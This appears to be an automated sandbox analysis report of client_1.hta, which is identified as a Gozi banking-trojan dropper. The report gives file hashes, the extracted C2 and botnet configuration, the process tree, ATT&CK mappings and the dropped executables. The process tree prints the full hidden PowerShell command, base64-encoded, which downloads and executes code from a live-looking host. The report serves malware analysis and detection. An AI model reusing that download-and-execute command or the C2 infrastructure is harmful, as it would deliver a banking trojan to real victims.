Analysis

  • max time kernel
    148s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    06-10-2023 12:16

General

  • Target

    client_1.hta

  • Size

    22KB

  • MD5

    57d3eb665f1e9e6a19f278baabd49e7b

  • SHA1

    44566a9d716e6abd0304544dd88d245fea990882

  • SHA256

    4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d

  • SHA512

    30a0a3349aa0b815728abdb0c770d65354cdcf68ca939de4c175bdb285e3d664d7afdddc4be91bae170a65e4f808e6de7cc877fa36442f64f7b7db993e83851d

  • SSDEEP

    384:rO6BO5aa8mOFhyS1q5H8qxAt4VFhmqmfW9PW6vN1v35Zh5LaBY5E6bqBdOfF:4zS0kPWVN5LbtcOfF

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\client_1.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2208
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2576
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2644
        • C:\Users\Admin\AppData\Local\Temp\qlCHc.exe
          "C:\Users\Admin\AppData\Local\Temp\qlCHc.exe"
          4⤵
          • Executes dropped EXE
          PID:2600

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\qlCHc.exe
    Filesize

    293KB

    MD5

    01435632dca9afc151eec77862bfbc2b

    SHA1

    9bbb4ae83131fafcd14d580810b14f48d2d30837

    SHA256

    2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

    SHA512

    61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

  • C:\Users\Admin\AppData\Local\Temp\qlCHc.exe
    Filesize

    293KB

    MD5

    01435632dca9afc151eec77862bfbc2b

    SHA1

    9bbb4ae83131fafcd14d580810b14f48d2d30837

    SHA256

    2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

    SHA512

    61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

  • \Users\Admin\AppData\Local\Temp\qlCHc.exe
    Filesize

    293KB

    MD5

    01435632dca9afc151eec77862bfbc2b

    SHA1

    9bbb4ae83131fafcd14d580810b14f48d2d30837

    SHA256

    2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

    SHA512

    61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

  • \Users\Admin\AppData\Local\Temp\qlCHc.exe
    Filesize

    293KB

    MD5

    01435632dca9afc151eec77862bfbc2b

    SHA1

    9bbb4ae83131fafcd14d580810b14f48d2d30837

    SHA256

    2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

    SHA512

    61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

  • memory/2600-20-0x00000000026F0000-0x00000000027F0000-memory.dmp
    Filesize

    1024KB

  • memory/2600-22-0x00000000003B0000-0x00000000003BB000-memory.dmp
    Filesize

    44KB

  • memory/2600-27-0x0000000000400000-0x000000000228F000-memory.dmp
    Filesize

    30.6MB

  • memory/2600-26-0x0000000000400000-0x000000000228F000-memory.dmp
    Filesize

    30.6MB

  • memory/2600-23-0x00000000003E0000-0x00000000003ED000-memory.dmp
    Filesize

    52KB

  • memory/2600-17-0x00000000026F0000-0x00000000027F0000-memory.dmp
    Filesize

    1024KB

  • memory/2600-18-0x00000000003B0000-0x00000000003BB000-memory.dmp
    Filesize

    44KB

  • memory/2600-19-0x0000000000400000-0x000000000228F000-memory.dmp
    Filesize

    30.6MB

  • memory/2600-21-0x0000000000400000-0x000000000228F000-memory.dmp
    Filesize

    30.6MB

  • memory/2644-2-0x0000000074030000-0x00000000745DB000-memory.dmp
    Filesize

    5.7MB

  • memory/2644-5-0x0000000002620000-0x0000000002660000-memory.dmp
    Filesize

    256KB

  • memory/2644-15-0x0000000074030000-0x00000000745DB000-memory.dmp
    Filesize

    5.7MB

  • memory/2644-3-0x0000000074030000-0x00000000745DB000-memory.dmp
    Filesize

    5.7MB

  • memory/2644-4-0x0000000002620000-0x0000000002660000-memory.dmp
    Filesize

    256KB